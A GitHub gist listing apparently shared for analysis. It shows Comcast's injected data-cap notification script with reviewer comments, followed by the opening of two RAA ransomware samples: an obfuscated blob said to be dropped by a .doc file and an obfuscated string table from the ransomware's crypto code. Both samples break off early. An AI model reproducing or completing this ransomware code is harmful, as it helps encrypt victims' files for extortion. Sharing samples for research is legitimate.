oumarxy / ComcastInject.html
Created April 12, 2017 14:50 — forked from ryankearney/ComcastInject.html
This is the code Comcast is injecting into its users' web traffic.
<script language="JavaScript" type="text/javascript">
// Comcast Cable Communications, LLC Proprietary. Copyright 2012.
// Intended use is to display browser notifications for critical and time sensitive alerts.
// Configuration strings for the notification banner. Per the page description,
// this script was inserted into pages the subscriber was loading; the code that
// renders these strings into the page is not part of this excerpt.
//
// SYS_URL is a root-relative path, so the browser resolves it against the origin
// of whatever page this script is running in rather than a fixed hostname.
// NOTE(review): presumably the injecting network device answers this path
// itself -- cannot be confirmed from this excerpt.
var SYS_URL='/e8f6b078-0f35-11de-85c5-efc5ef23aa1f/aupm/notify.do';
// Alternative image host, commented out in the captured sample.
// var image_url='http://servicealerts.comcast.net:8080/images/mt';
// Base URL for banner images; note the plain http:// scheme, so these assets
// are fetched without transport integrity or authentication.
var image_url='http://xfinity.comcast.net/constantguard/BotAssistance/notice/images';
// Banner copy. The values contain markup (<strong>, <b>), so they are
// presumably written into the page as HTML rather than text -- TODO confirm
// against the rendering code.
var headertext1='<strong>Comcast Courtesy Notice</strong>';
var textline1='You have reached 90% of your <b>monthly data usage allowance</b>.';
var textline2='Please sign in for more information and to remove this alert.';
// Sign-in link: an anchor with href="#" whose inline onClick sets
// document.location.href to SYS_URL plus the query string
// dispatch=redirect&redirectName=login&paramName=bmUid, wrapped around the
// mt_signin.png image from image_url.
// Defensive note: a sign-in prompt rendered inside an unrelated site's page is
// indistinguishable, to the user, from one inserted by any other on-path party;
// delivering pages over HTTPS prevents this kind of in-transit insertion.
var acknowledgebutton='<a href=\"#\" onClick="document.location.href=\''+SYS_URL+'?dispatch=redirect&redirectName=login&paramName=bmUid\'" title="Sign in to acknowledge" style="color: #FFFFFF;"><img alt="Sign in to acknowledge" src="'+image_url+'/mt_signin.png"/></a>';
oumarxy / RAA_ransomware_new_variant.js
Created April 12, 2017 14:33 — forked from Antelox/RAA_ransomware_new_variant.js
New RAA ransomware variant - code dropped by a .doc file
////1pelDZyydsTIR5Zri3YDm3hG5qDWSU0SMOml2APXT0G3P6AlpXW9crsWOlRhh8YXNSgCuSx1Zjzdgdom63F12MhHMkrdgGrdSupSnzqVGJpa5T1j1PDr4GQ52hbrBXEO2yO5MJw2yKhzKtBRVmH2XgU9eyRAdXfitQ7ClpUDz5c39YmHNDbqp6O5g0LMTlHOoISDSwxqnKSrqctz5QyK0fch83I7kym6PftqKPE2N4rWtIsjjcHQvf1C8CNCshPbHhfJ9yyRulOHyQKRDoGHtGIXhd3pp6x8K6WqADLhjj3E9TMMqEXrKSk2mBjMMyBANayM1frIWms1Hf1vx3noqPOJZ7bEd5MK4mXWrBYWc5ysmR2kzOKZWsBM35h44iAavITskbRgpPbvY8l1dRphJxYznVA8MVhij3dOJX4iFQimEvP0QyIVz4CPy0s2sQtz8sWAeZYsTOaCXwWyM6NrzG7AjDGWBA66WMlNPYbj35kH4nj8z8nKneuDfoHntevO8tebGI3T7uDeFCd3ZtBYOAFKemqomrJJO27ASNPPJIu0Vt4Cb60n4ZjmtwHy0st3X7jyoFqiwOJyhrekX9ooPdt9EiF7rAaZV4BQlhIPUuS4uiKhmzpyZlRUe9gYPBRgyTrgoNvfBJ44ITW8vQaanbri7DEajAmdnul88ghLzB4SNKFqDV1WB67GaIj989QiYcY5VvOchvCJPzZ5IJg5ijouN03foKODTD0nQdfATbxED1QlEpE2V0HwdABJaYkfTtchUEWHR7rmxXUbfEB2ICKY96TK6CbCbeRp4quRaborW9RqOIwDILqUSBHn3AYLX0IbATj415mdqAP21B217Uwq5YkQpEFuZh1kbKrYKNpTgwl30HbI6BAK5EqqHZBBdrEaLSfSGEDIYfxTqW8fmA7XtHjusZsPgM7TDcd4ghr7vEs6cqYAiV7cKSGTyuBTKJZXiOEAhq0ogNDsfoL0QeMCtqrBOoqoe1beFZ8z7cG8pDGpcfAmj64UNzXk
oumarxy / RAA.js
Created April 12, 2017 14:32 — forked from Antelox/RAA.js
RAA ransomware - Now payload code heavily obfuscated
var _0xc751 = ["length", "digits", "boolean", "slice", "isNeg", "charAt", "-", "0", "substr", "abs", "", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "min", "charCodeAt", "max", "fromCharCode", " ", "join", "floor", "ceil", "modulus", "mu", "bkplus1", "modulo", "multiplyMod", "powMod", "NoPadding", "PKCS1Padding", "RawEncoding", "NumericEncoding", "number", "chunkSize", "radix", "barrett", "string", "random", "split", "substring", "lib", "Base", "prototype", "mixIn", "init", "hasOwnProperty", "apply", "$super", "extend", "toString", "WordArray", "words", "sigBytes", "stringify", "clamp", "push", "call", "clone", "enc", "Hex", "Latin1", "Utf8", "Malformed UTF-8 data", "parse", "BufferedBlockAlgorithm", "_data", "_nDataBytes", "concat", "blockSize", "_minBufferSize", "splice", "Hasher", "cfg", "reset", "finalize", "HMAC", "algo", "Base64", "_map", "indexOf", "create", "ABCDEFGHIJKLMN